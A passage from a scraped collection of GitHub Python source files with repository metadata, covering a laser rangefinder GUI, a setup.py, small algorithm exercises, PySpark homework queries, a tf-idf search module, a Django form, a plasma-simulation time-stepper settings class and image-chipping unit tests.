round(tm*self.c*int(self.Measure_distance)/1000,1)\n if tm >= temp:\n self.display(200,f\"通過測試,最大測程大於標示距離:{int(int(self.Theoretical_distance)/1000)}公里\")\n self.display(300,f\"推算數據測程可達{distance}公里\",1)\n else:\n self.display(200,f\"該雷射測距儀未通過測試,未達{int(int(self.Theoretical_distance)/1000)}公里\")\n self.display(300,f\"推算數據測程僅達{distance}公里\",1)\n else:\n self.display(100,\"未通過測試,請重新開始\")\n self.backhome()\n\n\n @QtCore.Slot()\n def select(self):\n dialog = InputDialog.getValue(self,\"衰減倍率\",\"請輸入衰減倍率\")\n self.setValue = dialog\n tmp = str(self.setValue)+'x'\n self.display(100,\"目前倍率\"+tmp,0)\n self.key_num = self.keylist.index(tmp)\n self.move(self.data[tmp])\n\n\n#螢幕視窗功能\n def display(self,time=100,message=\"\",type=0):\n if type == 0:\n self.timer.singleShot(time,lambda:self.ui.Display.setText(message))\n elif type ==1:\n self.timer.singleShot(time,lambda:self.ui.Display.append(message))\n\napp = QApplication([])\nwindow = Stats()\napp.exec_()\n\n\n","repo_name":"NUUEO/motor_control","sub_path":"mnd401/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15442452041","text":"from pathlib import Path\n\nfrom setuptools import find_packages, setup\n\nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\nsetup(\n name=\"blitzml\",\n packages=find_packages(include=[\"blitzml\", \"blitzml.*\"]),\n version=\"0.20.0\",\n description=\"A low-code library for machine learning pipelines\",\n author=\"AI Team\",\n license=\"MIT\",\n install_requires=[\n \"joblib>=1.2.0\",\n \"numpy<=1.23.4\",\n \"pandas>=1.5.1\",\n \"scikit-learn>=1.1.3\",\n \"Boruta>=0.3\",\n \"statsmodels<=0.14\",\n ],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n)\n\n\n# Great resources\n# https://godatadriven.com/blog/a-practical-guide-to-using-setup-py/\n# https://realpython.com/pypi-publish-python-package/#publish-your-package-to-pypi\n# https://packaging.python.org/en/latest/overview/\n","repo_name":"blitzml/blitzml","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"22867360449","text":"\n\nclass node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = []\n\nclass ntree:\n def __init__(self,val=None):\n self.root = node(val)\n \n def add_child(self, val=None):\n cur_node = self.root\n new_node = node(val)\n\n cur_node.children.append(new_node)\n \nclass walk:\n def __init__(self):\n return\n def traverse(self, rt: node):\n\n r = []\n q = [rt]\n\n while q:\n cur_node = q.pop()\n\n if cur_node:\n r.append(cur_node.val)\n\n for c in cur_node.children:\n q.append(c)\n \n return r[::-1]\n\n def rtraverse(self,rt: node):\n if not rt:\n return []\n \n r = [rt.val]\n\n def helper(rt):\n\n for c in rt.children:\n r.append(c.val)\n helper(c)\n \n helper(rt)\n return r\n \nt = ntree(10)\nt.add_child(14)\nt.add_child(15)\nt.add_child(16)\nw = walk()\n\nprint(w.traverse(t.root))\nprint(w.rtraverse(t.root))","repo_name":"jcravener/PythonWorkroom","sub_path":"ntree2.py","file_name":"ntree2.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27636386087","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 28 19:17:57 2021\n\n@author: andreavergara\n\"\"\"\n\ndef mensaje ():\n print (\"\\tPor favor ingresa el numero: \\n\")\n\nprint (\"Inicio\")\nmensaje()\na=input()\nmensaje()\nb=input()\nmensaje()\nc=input()\nprint(a,b,c)\n\ndef hi (name): \n print (\"Hi: \",name)\nhi (\"Juan Carlos\")\nhi(\"cec\")\nhi(\"Ana\")\n\n\"\"\"\nCreated on Mon Jun 28 20:30:00 2021\n\n@author: andreavergara\narg es un argumento para convertir en una tupla, me permite \nhacer que la funcion se convierta en distintos valores\n\n\"\"\"\n\ndef suma(*arg):\n print(\"Tipo de datos del argumento; \", type(arg))\n sum = 0\n \n for n in arg: \n sum +=n \n #sum=sum+n \n \n print (\"Suma: \", sum)\n \nsuma(3)\nsuma(3,5)\nsuma(4,5,6,7)\nsuma(1,2,3,5,6)\n\n\"\"\"\nCreated on Mon Jun 28 20:36:54 2021\n\n@author: andreavergara\n\"\"\"\n\ndef keyw(**datos):\n print(\"\\nTipo de datos del argumento:\",type(datos))\n\n for key, value in datos.items():\n print(\"{} is {}\".format(key,value))\n\nkeyw(Firstname=\"Juan\", \n Lastname=\"Domínguez\", \n Age=42, \n Phone=1234567890)\nkeyw(Firstname=\"John\", \n Lastname=\"Wood\",\n Email=\"johnwood@nomail.com\",\n Country=\"Wakanda\", \n Age=25, \n Phone=9876543210)\n","repo_name":"Andreya9520/Python-Essential-","sub_path":"clase5.py","file_name":"clase5.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23172516802","text":"def target_sum(arr, t):\n seen = {}\n for i in range(len(arr)):\n num = arr[i]\n complement = t - num\n if num in seen:\n return seen[num]+1, i+1\n else:\n seen[complement] = i\n return -1\n\n\nf = open(\"input1.txt\", \"r\")\ng = open(\"output1.2.txt\", \"w\")\n\nn, target = list(map(int, f.readline().split(\" \")))\nitems = list(map(int, f.readline().split(\" \")))\n\nindex = target_sum(items, target)\nif index == -1:\n g.write(\"IMPOSSIBLE\")\nelse:\n g.write(str(index[0]) + \" \" + str(index[1]))\nf.close()\ng.close()\n","repo_name":"ReduanNurLabid/CSE221","sub_path":"task-1.2.py","file_name":"task-1.2.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21187901991","text":"from pyspark.sql import SparkSession\n\n\nspark = SparkSession.builder \\\n .master(\"local[1]\") \\\n .appName(\"hw5\") \\\n .getOrCreate()\n\n# 2a\nimport pyspark.sql.functions as fc\n\ncountryLang = spark.read.json('countrylanguage.json')\ncountryLang.filter('IsOfficial == \"T\"').groupBy('Language').agg(fc.count('*').alias('cnt')).orderBy('cnt', ascending=False).limit(10).show(truncate=False)\n\n# 2b\n\ncountry = spark.read.json('country.json')\ncity = spark.read.json('city.json')\ncountry.filter('Continent == \"North America\" and GNP >= 100000').select('Capital', country.Name.alias('CountryName')).join(city.select('ID', city.Name.alias('CapitalName')), country.Capital == city.ID).select('CountryName', 'CapitalName').show(truncate=False)\n\n\n# 2c\n\ncountry = spark.read.json('country.json')\ncountryLang = spark.read.json('countrylanguage.json')\ncountry.join(countryLang, (country.Continent == 'North America') & (country.Code == countryLang.CountryCode) & (countryLang.Language == 'English') & (countryLang.IsOfficial == 'T')).select('Name').show(truncate=False)\n\n# 2d\nimport pyspark.sql.functions as fc\n\ncity = spark.read.json('city.json')\ncity.filter('CountryCode == \"USA\"').agg(fc.max('Population')).show(truncate=False)\n\n# 2e\n\ncountryLang = spark.read.json('countrylanguage.json')\ncountryLang.filter('Language == \"English\" and IsOfficial == \"T\"').select('CountryCode').intersect(countryLang.filter('Language == \"French\" and IsOfficial == \"T\"').select('CountryCode')).show(truncate=False)\n\n","repo_name":"bvorapoom/usc_apds","sub_path":"551_Data Management/Homework5/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37456777204","text":"# JadenCase 문자열 만들기\n# https://programmers.co.kr/learn/courses/30/lessons/12951?language=python3\n\n# 빈 문자열 answer와 문자열 s의 공백을 제외하고 대소문자 처리를 진행해줄 count를 변수로 설정하고\n# s 길이만큼 for문을 돌려 i가 공백일시에 count를 i + 1처리를 해줘서 공백을 지나치고 다음번 문자로 넘어갈수 있게\n# 조건을 걸어준다. elif로 i + 1을 넣어준 count와 i를 비교해 가장 첫자리는 upper함수로 대문자를 출력하고\n# else로 나머지 소문자를 출력해준다.\n\nimport pytest\ndef solution(s):\n answer, count = '', 0\n for i in range(len(s)):\n if s[i] == ' ':\n answer += s[i]\n count = i + 1\n elif i == count:\n answer += s[i].upper()\n else:\n answer += s[i].lower()\n return answer\n\ndef test_solution():\n assert solution(\"3people unFollowed me\") == \"3people Unfollowed Me\"\n assert solution(\"for the last week\") == \"For The Last Week\"\n","repo_name":"dueytree/Algorithm_test","sub_path":"jadencase.py","file_name":"jadencase.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20760025212","text":"#!/usr/bin/python\n\n# Import standard modules\nimport math\n\n#======================================================================#\n# Program Description:\n# Responsible for the search computations in search.py\n# Contains methods for tf-idf weight computation and vector normalization.\n#======================================================================#\nclass Search_Compute:\n len_docIDs = 0\n list_doc_length_IPC = {}\n \n def __init__(self, list_of_docID_len, list_doc_length_IPC):\n self.len_docIDs = list_of_docID_len\n self.list_doc_length_IPC = list_doc_length_IPC\n \n def get_docID_length(self, docID):\n return self.list_doc_length_IPC[docID][0]\n\n def get_docID_IPC(self, docID):\n return self.list_doc_length_IPC[docID][1]\n \n #==================================================================#\n # Computation methods\n #==================================================================#\n \n \"\"\"\n Computes the weighted tf-idf score for a docID given in a specific postings list.\n \n zone_type \"title\", \"abstr\" section specifiers for the document.\n term_postings Postings list of a query term\n query_term_weight Query term score\n scores Mapping of { docID : current score }\n \n return New updated mapping of scores for { docID : score }\n \"\"\"\n def compute_weighted_score(self, zone_type, term_postings, query_term_weight, scores):\n # All element values should sum to 1.0 (\"abstr\" represents \"abstract\")\n zone_weights = { \"title\" : 0.7, \"abstr\" : 0.3 }\n \n # Term will be ignored if it does not exist in the dictionary in all zones (postings are empty)\n if term_postings[zone_type] is not None:\n for docID_termFreq_pair in term_postings[zone_type]:\n curr_docID = docID_termFreq_pair[0]\n term_freq = docID_termFreq_pair[1]\n \n # Document score weighted against its zone type\n doc_term_weight = self.get_log_tf_weight(term_freq) * zone_weights[zone_type]\n \n # Dot product of query and doc term weights\n if not scores.has_key(curr_docID):\n scores[curr_docID] = 0\n scores[curr_docID] += query_term_weight * doc_term_weight\n return scores\n\n \n \"\"\"\n Computes the term frequency log weights of each query term in the input.\n Will compute for duplicated query terms only once.\n \n Precondition: \n All query terms passed in must be already be normalized.\n Duplicate query terms must not be filtered from the list of query terms.\n \n Arguments:\n old_normalized_list List of query terms performed at the first search operation\n new_normalized_list List of query terms performed at the query expansion\n Specify None if only doing the first search operation\n \n return A mapping of term frequencies for each query term\n \"\"\"\n def compute_query_tf_weight(self, old_normalized_list, new_normalized_list):\n query_term_freq_map = {}\n combined_list = list(old_normalized_list)\n \n if not new_normalized_list is None: # Checks if we are doing query expansion now\n combined_list.extend(new_normalized_list)\n for query_term in new_normalized_list:\n if not query_term in old_normalized_list:\n # This is a completely new query term due to Query Expansion\n if not query_term_freq_map.has_key(query_term): # Checks for duplicate keys\n query_term_freq_map[query_term] = \\\n self.get_log_tf_weight(combined_list.count(query_term)) * 0.5\n \n for query_term in old_normalized_list:\n if not query_term_freq_map.has_key(query_term): # Checks for duplicate keys\n if not (new_normalized_list is None) and (query_term in new_normalized_list):\n # If the term is also in the new query list, it is \"more important\"\n weight = 2.0\n else:\n # If the term was in the original old query list and is not new\n weight = 1.0\n query_term_freq_map[query_term] = \\\n self.get_log_tf_weight(combined_list.count(query_term)) * weight\n \n return query_term_freq_map\n \n \"\"\"\n Computes the idf of a query term.\n \n query_term Query term in String format\n term_postings Query term's postings across all zone types\n \n return Inverse doc frequency of a query term.\n \"\"\"\n def get_idf(self, query_term, term_postings):\n doc_freq = 0\n \n # Make a big postings list joining each zone-specific postings for query idf computation\n term_postings_all = self.combine_list(term_postings[\"title\"], term_postings[\"abstr\"])\n \n if term_postings_all is not None:\n combined_term_postings = \\\n set([docID_termFreq_pair[0] for docID_termFreq_pair in term_postings_all])\n doc_freq = len(combined_term_postings)\n if doc_freq == 0:\n # query term does not occur in ANY doc and should not have weight\n return 0\n else:\n return math.log(float(self.len_docIDs) / doc_freq, 10)\n \n \"\"\"\n Computes the logarithmic frequency weight of a term.\n \n term_freq Term frequency in a document.\n \n return Log term frequency weight.\n \"\"\"\n def get_log_tf_weight(self, term_freq):\n if term_freq == 0:\n return 0;\n else:\n return 1 + math.log(term_freq, 10)\n \n \"\"\"\n Computes the normalization of tf-idf scores for all result docIDs.\n \n scores Mapping of { docID : score }\n list_of_query_idf List of idf values for the query vectors\n \n return New updated mapping of { docID : score } normalized\n \"\"\"\n def normalize_scores(self, scores, list_of_query_idf):\n query_norm = self.get_query_unit_magnitude(list_of_query_idf)\n for docID in scores.keys():\n # Doc length can be obtained from the pickle object loaded from disk\n if not (self.get_docID_length(docID) == 0):\n norm_magnitude = query_norm * self.get_docID_length(docID)\n scores[docID] = (scores[docID] / norm_magnitude)\n return scores\n \n \"\"\"\n Computes the magnitude of the query vector for normalization.\n \n list_of_query_idf List of query term idf values.\n \n return Magnitude of the query vector.\n \"\"\"\n def get_query_unit_magnitude(self, list_of_query_idf):\n query_norm = 1;\n for idf_value in list_of_query_idf:\n if not idf_value == 0:\n query_norm *= math.pow(idf_value, 2)\n return math.sqrt(query_norm)\n \n #======================================================================#\n # Auxillary helper functions:\n #======================================================================#\n \n \"\"\"\n Combines a copy of the contents of a list and appends a copy of the contents \n of the operand list to it.\n \n list1 Base\n list2 List to append to list1\n \n return Combined list of list1 and list2\n \"\"\" \n def combine_list(self, list1, list2):\n if not list2 is None:\n combined = list(list1)\n combined.extend(list2)\n return combined\n else:\n return list1\n","repo_name":"NatashaKSS/info-retrieval-of-patent-docs","sub_path":"search_computation.py","file_name":"search_computation.py","file_ext":"py","file_size_in_byte":7626,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"12047268604","text":"with open('input.txt') as f:\n inputs = f.read()\n\ncounter = 0\nfor line in inputs.splitlines():\n encoding, sequence = line.split(': ')\n range, character = encoding.split(' ')\n low, high = range.split(\"-\")\n appearances = sequence.count(character)\n counter += int(int(low) <= appearances <= int(high))\nprint(counter)","repo_name":"UtnansN/Advent-Of-Code-20","sub_path":"day2/day2-a.py","file_name":"day2-a.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22736572652","text":"#\n# TimeStepper settings object\n# #################################\n\nimport numpy as np\n\nfrom .. DREAMException import DREAMException\nfrom . ToleranceSettings import ToleranceSettings\n\n\nTYPE_CONSTANT = 1\nTYPE_ADAPTIVE = 2\nTYPE_IONIZATION = 3\n\n\nclass TimeStepper:\n \n def __init__(self, ttype=1, checkevery=0, tmax=None, dt=None, nt=None, nSaveSteps=0, reltol=1e-2, verbose=False, constantstep=False):\n \"\"\"\n Constructor.\n \"\"\"\n self.set(ttype=ttype, checkevery=checkevery, tmax=tmax, dt=dt, nt=nt, nSaveSteps=nSaveSteps, reltol=reltol, verbose=verbose, constantstep=constantstep)\n \n\n def set(self, ttype=1, checkevery=0, tmax=None, dt=None, nt=None, nSaveSteps=0, reltol=1e-2, verbose=False, constantstep=False, minsavedt=0):\n \"\"\"\n Set properties of the time stepper.\n \"\"\"\n self.type = int(ttype)\n\n self.setCheckInterval(checkevery)\n self.setTmax(tmax)\n self.setDt(dt)\n self.setNt(nt)\n self.setMinSaveTimestep(minsavedt)\n self.setNumberOfSaveSteps(nSaveSteps)\n self.setVerbose(verbose)\n self.setConstantStep(constantstep) \n self.tolerance = ToleranceSettings()\n self.tolerance.set(reltol=reltol)\n \n self.dtmax = None\n self.automaticstep = None\n self.safetyfactor = None\n\n\n def __contains__(self, item):\n return (item in self.todict(False))\n\n\n def __getitem__(self, key):\n return self.todict(False)[key]\n\n\n ######################\n # SETTERS\n ######################\n def setCheckInterval(self, checkevery):\n if checkevery < 0:\n raise DREAMException(\"TimeStepper: Invalid value assigned to 'checkevery': {}\".format(checkevery))\n \n self.checkevery = int(checkevery)\n\n\n def setConstantStep(self, constantstep):\n self.constantstep = bool(constantstep)\n\n\n def setDt(self, dt):\n if dt is None:\n self.dt = None\n return\n\n if dt < 0 or (dt == 0 and self.type != TYPE_IONIZATION):\n raise DREAMException(\"TimeStepper: Invalid value assigned to 'dt': {}\".format(tmax))\n if self.nt is not None and dt > 0:\n raise DREAMException(\"TimeStepper: 'dt' may not be set alongside 'nt'.\")\n \n self.dt = float(dt)\n\n\n def setMinSaveTimestep(self, dt):\n \"\"\"\n For the adapative ionization-based time stepper, sets the minimum\n time which must elapse between two saved time steps.\n \"\"\"\n self.minsavedt = dt\n\n\n def setNt(self, nt):\n if nt is None:\n self.nt = None\n return\n\n if nt <= 0:\n raise DREAMException(\"TimeStepper: Invalid value assigned to 'dt': {}\".format(tmax))\n if self.dt is not None and self.dt > 0:\n raise DREAMException(\"TimeStepper: 'nt' may not be set alongside 'dt'.\")\n \n self.nt = int(nt)\n\n\n def setNumberOfSaveSteps(self, nSaveSteps):\n \"\"\"\n Sets the number of time steps to save to the output file.\n This number must be <= Nt. If 0, all time steps are saved.\n \"\"\"\n self.nSaveSteps = nSaveSteps\n\n\n def setRelTol(self, reltol): self.setRelativeTolerance(reltol=reltol)\n\n\n def setRelativeTolerance(self, reltol):\n if reltol <= 0:\n raise DREAMException(\"TimeStepper: Invalid value assigned to 'reltol': {}\".format(reltol))\n\n self.tolerance.set(reltol=float(reltol))\n\n\n def setTmax(self, tmax):\n if tmax is None:\n self.tmax = None\n return\n\n if tmax <= 0:\n raise DREAMException(\"TimeStepper: Invalid value assigned to 'tmax': {}\".format(tmax))\n\n self.tmax = float(tmax)\n\n\n def setType(self, ttype, *args, **kwargs):\n if ttype not in [TYPE_CONSTANT, TYPE_ADAPTIVE, TYPE_IONIZATION]:\n raise DREAMException(\"TimeStepper: Unrecognized time stepper type specified: {}\".format(ttype))\n\n if ttype in [TYPE_ADAPTIVE, TYPE_IONIZATION]:\n self.nt = None\n\n self.type = int(ttype)\n \n if ttype == TYPE_IONIZATION:\n self.setIonization(*args, **kwargs)\n \n\n def setIonization(self, dt0=0, dtmax=0, tmax=None, automaticstep=1e-12, safetyfactor=50):\n \"\"\"\n Select and set parameters for the ionization time stepper.\n \"\"\"\n self.type = TYPE_IONIZATION\n self.dt = dt0\n self.dtmax = dtmax\n self.automaticstep = automaticstep\n self.safetyfactor = safetyfactor\n\n if tmax is not None:\n self.tmax = tmax\n\n\n def setVerbose(self, verbose=True):\n self.verbose = bool(verbose)\n\n\n def fromdict(self, data):\n \"\"\"\n Load settings from the given dictionary.\n \"\"\"\n def scal(v):\n if type(v) == np.ndarray: return v[0]\n else: return v\n\n self.type = data['type']\n self.tmax = data['tmax']\n\n if type(self.type) == np.ndarray: self.type = int(self.type.flatten()[0])\n if type(self.tmax) == np.ndarray: self.tmax = float(self.tmax.flatten()[0])\n\n if 'automaticstep' in data: self.automaticstep = float(scal(data['automaticstep']))\n if 'checkevery' in data: self.checkevery = int(scal(data['checkevery']))\n if 'constantstep' in data: self.constantstep = bool(scal(data['constantstep']))\n if 'dt' in data: self.dt = float(scal(data['dt']))\n if 'dtmax' in data: self.dtmax = float(scal(data['dtmax']))\n if 'minsavedt' in data: self.minsavedt = float(scal(data['minsavedt']))\n if 'nt' in data: self.nt = int(scal(data['nt']))\n if 'nsavesteps' in data: self.nSaveSteps = int(scal(data['nsavesteps']))\n if 'verbose' in data: self.verbose = bool(scal(data['verbose']))\n if 'safetyfactor' in data: self.safetyfactor = float(scal(data['safetyfactor']))\n if 'tolerance' in data: self.tolerance.fromdict(data['tolerance'])\n \n self.verifySettings()\n\n\n def todict(self, verify=True):\n \"\"\"\n Returns a Python dictionary containing all settings of\n this TimeStepper object.\n \"\"\"\n if verify:\n self.verifySettings()\n\n data = {\n 'type': self.type,\n 'tmax': self.tmax\n }\n\n if self.dt is not None: data['dt'] = self.dt\n\n if self.type == TYPE_CONSTANT:\n if self.nt is not None: data['nt'] = self.nt\n data['nsavesteps'] = int(self.nSaveSteps)\n elif self.type == TYPE_ADAPTIVE:\n data['checkevery'] = self.checkevery\n data['constantstep'] = self.constantstep\n data['tolerance'] = self.tolerance.todict()\n data['verbose'] = self.verbose\n elif self.type == TYPE_IONIZATION:\n if self.dtmax is not None: data['dtmax'] = self.dtmax\n data['automaticstep'] = self.automaticstep\n data['safetyfactor'] = self.safetyfactor\n data['minsavedt'] = self.minsavedt\n\n return data\n\n\n def verifySettings(self):\n \"\"\"\n Verify that the TimeStepper settings are consistent.\n \"\"\"\n if self.type == TYPE_CONSTANT:\n if self.tmax is None or self.tmax <= 0:\n raise DREAMException(\"TimeStepper constant: 'tmax' must be set to a value > 0.\")\n \n # Verify that _exactly_ one of 'dt' and 'nt' is\n # set to a valid value\n dtSet = (self.dt is not None and self.dt > 0)\n ntSet = (self.nt is not None and self.nt > 0)\n\n if dtSet and ntSet:\n raise DREAMException(\"TimeStepper constant: Exactly one of 'dt' and 'nt' must be > 0.\")\n\n if self.nSaveSteps < 0 or (ntSet and self.nSaveSteps > self.nt):\n raise DREAMException(\"TimeStepper constant: Invalid value assigned to 'nSaveSteps'. Must between 0 and nt.\")\n elif self.type == TYPE_ADAPTIVE:\n if self.tmax is None or self.tmax <= 0:\n raise DREAMException(\"TimeStepper adaptive: 'tmax' must be set to a value > 0.\")\n elif self.nt is not None:\n raise DREAMException(\"TimeStepper adaptive: 'nt' cannot be used with the adaptive time stepper.\")\n\n if type(self.checkevery) != int or self.checkevery < 0:\n raise DREAMException(\"TimeStepper adaptive: 'checkevery' must be a non-negative integer.\")\n elif type(self.verbose) != bool:\n raise DREAMException(\"TimeStepper adaptive: 'verbose' must be a boolean.\")\n elif type(self.constantstep) != bool:\n raise DREAMException(\"TimeStepper adaptive: 'constantstep' must be a boolean.\")\n self.tolerance.verifySettings()\n elif self.type == TYPE_IONIZATION:\n if self.tmax is None or self.tmax <= 0:\n raise DREAMException(\"TimeStepper ionization: 'tmax' must be set to a value > 0.\")\n elif self.dt is None or self.dt < 0:\n raise DREAMException(\"TimeStepper ionization: 'dt' must be set to a non-negative value.\")\n elif self.dtmax is None or self.dtmax < 0:\n raise DREAMException(\"TimeStepper ionization: 'dtmax' must be set to a non-negative value.\")\n elif self.minsavedt < 0:\n raise DREAMException(\"TimeStepper ionization: 'minsavedt' must be non-negative.\")\n else:\n raise DREAMException(\"Unrecognized time stepper type selected: {}.\".format(self.type))\n\n\n","repo_name":"chalmersplasmatheory/DREAM","sub_path":"py/DREAM/Settings/TimeStepper.py","file_name":"TimeStepper.py","file_ext":"py","file_size_in_byte":9499,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"42057451985","text":"# coding: utf-8\n\nfrom django import forms\n\nfrom employees.models import Employee\n\n# Create your forms here.\n\nPROJECT_STATUS = (\n ('Any', 'Any'),\n ('Not started', 'Not started'),\n ('In development', 'In development'),\n ('Finished', 'Finished'),\n)\n\nYEARS = (\n ('2004', '2004'),\n ('2005', '2005'),\n ('2006', '2006'),\n ('2007', '2007'),\n ('2008', '2008'),\n ('2009', '2009'),\n ('2010', '2010'),\n ('2011', '2011'),\n ('2012', '2012'),\n ('2013', '2013'),\n ('2014', '2014'),\n ('2015', '2015'),\n ('2016', '2016'),\n ('2017', '2017'),\n ('2018', '2018'),\n ('2019', '2019'),\n)\n\nGEOGRAPHICAL_SCOPE = (\n ('All', 'All'),\n ('Araba', 'Araba'),\n ('Bizkaia', 'Bizkaia'),\n ('Gipuzkoa', 'Gipuzkoa'),\n ('Euskadi', 'Euskadi'),\n ('Spain', 'Spain'),\n ('Europe', 'Europe'),\n ('International', 'International'),\n)\n\nAND_OR = (\n ('AND', 'AND'),\n ('OR', 'OR'),\n)\n\n\n#########################\n# Class: SemanticSearchForm\n#########################\n\nclass SemanticSearchForm(forms.Form):\n title = forms.CharField(max_length = 150, required = False)\n status = forms.ChoiceField(choices = PROJECT_STATUS, initial = \"Any\", required = False)\n scope = forms.ChoiceField(choices = GEOGRAPHICAL_SCOPE, initial = \"All\", required = False)\n start_year = forms.ChoiceField(choices = YEARS, initial = 2004, required = False)\n end_year = forms.ChoiceField(choices = YEARS, initial = 2013, required = False)\n researchers = forms.ModelMultipleChoiceField(queryset = Employee.objects.all(), required = False)\n and_or = forms.ChoiceField(widget = forms.RadioSelect(), choices = AND_OR, required = False)\n","repo_name":"OscarPDR/projects_morelab","sub_path":"semantic_search/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26097942913","text":"import unittest\nfrom resippy.test_runner import demo_data_base_dir\nfrom resippy.utils import file_utils as file_utils\nfrom resippy.utils.image_utils import image_chipper\nfrom resippy.utils.image_utils import image_utils\nfrom imageio import imread\nimport numpy as np\nimport random\n\n\nclass TestChipper(unittest.TestCase):\n print(\"TEST CHIPPER TESTS\")\n\n def setUp(self):\n print(\"\")\n self.png_fullpath = file_utils.get_path_from_subdirs(demo_data_base_dir,\n [\"image_data\",\n \"overhead_vehicle_data\",\n \"Potsdam_ISPRS\",\n \"top_potsdam_2_14_RGB.png\"])\n self.png_image_data = imread(self.png_fullpath)\n png_shape = self.png_image_data.shape\n self.ny = png_shape[0]\n self.nx = png_shape[1]\n self.nbands = png_shape[2]\n\n def test_overlap(self):\n print(\"\")\n chip_size = 256\n npix_overlap = 128\n rgb_chips, rgb_chips_indices = image_chipper.chip_entire_image_to_memory(self.png_image_data,\n bands=[0, 1, 2],\n chip_nx_pixels=chip_size,\n chip_ny_pixels=chip_size)\n rgb_y_overlap_chips, rgb_y_overlap_chip_indices = image_chipper.\\\n chip_entire_image_to_memory(self.png_image_data,\n npix_overlap_y=npix_overlap,\n chip_nx_pixels=chip_size,\n chip_ny_pixels=chip_size,\n bands=[0, 1, 2])\n n_rgb_chips = len(rgb_chips)\n n_rgb_w_overlap = len(rgb_y_overlap_chip_indices)\n ny, nx, nbands = image_utils.get_image_ny_nx_nbands(self.png_image_data)\n\n assert np.ceil(ny/chip_size) * np.ceil(nx/chip_size) == n_rgb_chips\n assert np.ceil((ny/chip_size) * 2 - 1) * np.ceil(nx/chip_size) == n_rgb_w_overlap\n print(\"overlap is working as expected\")\n print(\"OVERLAP TEST PASSED\")\n\n def test_bands(self):\n print(\"\")\n rgb_bands_list = [0, 1, 2]\n full_chips, full_chips_indices = image_chipper.chip_entire_image_to_memory(self.png_image_data)\n rgb_chips, rgb_chips_indices = image_chipper.chip_entire_image_to_memory(self.png_image_data,\n bands=rgb_bands_list)\n n_chips_full = full_chips.shape[0]\n n_chips_rgb = rgb_chips.shape[0]\n assert n_chips_full == n_chips_rgb\n print(\"number of full chips and number of grayscale chips match\")\n\n for i in range(n_chips_full):\n full_chip = full_chips[i]\n rgb_chip = rgb_chips[i]\n assert(full_chip[:, :, rgb_bands_list] == rgb_chip).all()\n print(\"full chips using bands subset list matches rgb chips\")\n print(\"TEST BANDS TEST PASSED\")\n\n def test_grayscale(self):\n print(\"\")\n band_num = 0\n full_chips, full_chips_indices = image_chipper.chip_entire_image_to_memory(self.png_image_data)\n grayscale_chips, grayscale_chip_indices = image_chipper.chip_entire_image_to_memory(self.png_image_data,\n bands=band_num)\n\n n_chips_full = full_chips.shape[0]\n n_chips_grayscale = grayscale_chips.shape[0]\n assert n_chips_full == n_chips_grayscale\n print(\"test chipper - number of full chips and number of rgb chips match\")\n\n for i in range(n_chips_full):\n full_chip = full_chips[i]\n grayscale_chip = grayscale_chips[i]\n assert grayscale_chip.shape != full_chip.shape\n assert (full_chip[:, :, band_num] == grayscale_chip).all()\n print(\"test chipper - grayscale test passed\")\n\n def test_lower_right(self):\n print(\"\")\n chip_nx_pixels = 217\n chip_ny_pixels = 217\n full_chips, full_chips_indices = image_chipper.chip_entire_image_to_memory(self.png_image_data,\n chip_ny_pixels=chip_ny_pixels,\n chip_nx_pixels=chip_nx_pixels)\n lower_right_image = self.png_image_data[(self.ny-chip_ny_pixels):, (self.nx-chip_nx_pixels):, :]\n assert (full_chips[-1] == lower_right_image).any()\n print(\"last chip matches the lower corner of the original image.\")\n print(\"LOWER RIGHT TEST PASSED\")\n\n def test_keep_within_bounds(self):\n print(\"\")\n ul_y = [self.ny - 10, -10]\n ul_x = [self.nx - 10, -10]\n chip_ny_pixels = 217\n chip_nx_pixels = 217\n chips, ul_indices = image_chipper.chip_images_by_pixel_upper_lefts(self.png_image_data, ul_y, ul_x,\n chip_ny_pixels=chip_ny_pixels,\n chip_nx_pixels=chip_nx_pixels)\n lower_right_image = self.png_image_data[(self.ny - chip_ny_pixels):, (self.nx - chip_nx_pixels):, :]\n assert(chips[0] == lower_right_image).all()\n\n upper_left_image = self.png_image_data[0:chip_ny_pixels, 0:chip_nx_pixels]\n assert(chips[1] == upper_left_image).all()\n\n print(\"chipping out within image bounds\")\n print(\"\")\n\n def test_chip_by_centers(self):\n n_samples = 20\n chip_size = 256\n y_uls = random.sample(list(np.arange(0, self.ny)), n_samples)\n x_uls = random.sample(list(np.arange(0, self.nx)), n_samples)\n\n x_centers = np.add(x_uls, chip_size/2).astype(int)\n y_centers = np.add(y_uls, chip_size/2).astype(int)\n\n chips_by_ul, indices_by_ul = image_chipper.chip_images_by_pixel_upper_lefts(\n self.png_image_data, pixel_y_ul_list=y_uls, pixel_x_ul_list=x_uls,\n chip_nx_pixels=chip_size, 